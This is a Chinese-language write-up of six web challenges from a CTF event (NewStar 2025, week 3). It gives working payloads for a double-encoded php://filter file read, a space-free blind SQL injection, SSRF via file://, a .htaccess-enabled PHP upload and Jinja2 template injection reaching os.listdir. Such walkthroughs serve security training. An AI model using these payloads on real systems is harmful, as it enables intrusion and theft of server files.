NewStar CTF 2025公开赛道-web题目-week3-writeup

ez-chain

根据源码，分析需要绕过两层waf：首先需要传入file参数，传入的参数经过第一层waf，因为还未进行解码，所以可以通过双重编码绕过，另外一层waf因为会将读取内容进行判断是否内容包含f字符，然后进行base64层层解码继续判断是否存在f字符，所以此处不能使用base64编码读取内容，可以使用rot13编码读取绕过:

原始payload:

php://filter/read=string.rot13/resource=/flag

双重编码以后的payload:

%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2572%2565%2561%2564%253d%2573%2574%2572%2569%256e%2567%252e%2572%256f%2574%2531%2533%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%252f%2566%256c%2561%2567

浏览器传入payload:

file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2572%2565%2561%2564%253d%2573%2574%2572%2569%256e%2567%252e%2572%256f%2574%2531%2533%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%252f%2566%256c%2561%2567

flag{2d6baf66-878b-4f14-952e-86fca723f7d5}

白帽小K的故事（2）

启动访问题目：

是一个查询接口：

经过基本的sql注入payload测试发现空格是被过滤掉的。

右下角有个提示，点开看了看：

基本知道是使用字符盲注了。那还等啥，直接二分法脚本（大家自己网上搜一下payload改一下就行,我就不贴出来了，太占篇幅）爆破数据库，表，字段，导出数据即可，空格使用()绕过即可。基本payload：

payload= "amiya'^(ascii(substr((select(group_concat(flag))from(Flag.flag)),%d,1))<%d)^1#" % (i,mid)

爆破数据库：

表和列：

导出数据：

flag{4bff70f3-f336-489b-a4d5-d23d4e410f3b}

mygo!!!

访问查看源码：

尝试扫描文件，发现flag.php，直接访问：

https://eci-2ze783w94rticdke15eh.cloudeci1.ichunqiu.com:80/?proxy=http%3A%2F%2Flocalhost%2Fflag.php

接下来就一目了然了，直接构造file协议读取flag即可：

https://eci-2ze783w94rticdke15eh.cloudeci1.ichunqiu.com:80/?proxy=http%3A%2F%2Flocalhost%2Fflag.php?soyorin=file:////flag

flag{2dce6900-7056-494a-8bef-4fe13729ab65}

小E的秘密计划

根据题目描述先找到网站备份文件：直接扫描发现是www.zip

根据源码，发现目录和文件如下：

并且有登录页面，需要在git中找，那就使用git提取工具提取文件：

提取后的文件：

拿到了用户名和密码

那就访问登录呗

登录成功后提示，mac写的代码，那就是.DS_Store

https://eci-2zed6yp2av3gey0zzusg.cloudeci1.ichunqiu.com:80/secret-1c84a90c-d114-4acd-b799-1bc5a2b7be50/.DS_Store

打开下载的文件：

看到了flag应该在f f f f l l l l a a a a g g g g 1 1 4 5 1 4中，去掉空格访问ffffllllaaaagggg114514即可拿到flag

flag{10d8488e-ca8a-4f27-a1dd-afa8cbed3121}

mirror_gate

启动环境访问查看源码发现提示：

那就扫描uoloads看看有啥，发现.htaccess

访问发现是将webp当做php解析，那就是常规文件上传套路了，上传一个webp文件，内容为包含flag文件即可，根据提示flag是在flag.php,那就上传包含该文件即可

上传的时候发现<?php会被检测为恶意的，并禁止上传，所以直接通过<?  ?>包含即可

请求如下：

然后访问上传的文件即可拿到flag

flag{376e54c4-6dce-49aa-ae2f-67c14122bdf7}

who'ssti

下载附件查看代码：

会随机选择五个函数要求你触发调用，触发调用完成之后就会给你flag,，常规ssti调用，发送以下payload就会分别触发对应的函数，根据你的环境分别发送即可

{{config}} {{ config.__class__.__init__.__globals__.__builtins__.__import__('random').randint(1, 100) }} {{ config.__class__.__init__.__globals__.__builtins__.__import__('textwrap').dedent(' test\n ') }} {{ config.__class__.__init__.__globals__.__builtins__.__import__('difflib').get_close_matches('test', ['test', 'testing']) }} {{ config.__class__.__init__.__globals__.__builtins__.__import__('statistics').fmean([1, 2, 3, 4, 5]) }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('random').choice(['a','b','c']) }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('statistics').mean([1,2,3,4,5]) }} {{ lipsum.__globals__.os.listdir('.') }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('re').search('test', 'test string') }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('re').findall('t', 'test') }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('pickle').loads.__name__ }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('numpy').sum([1,2,3,4,5]) }}

依次发送即可

得到flag

flag{305b3fc4-ca20-4a7b-8a9e-daa048240bd3}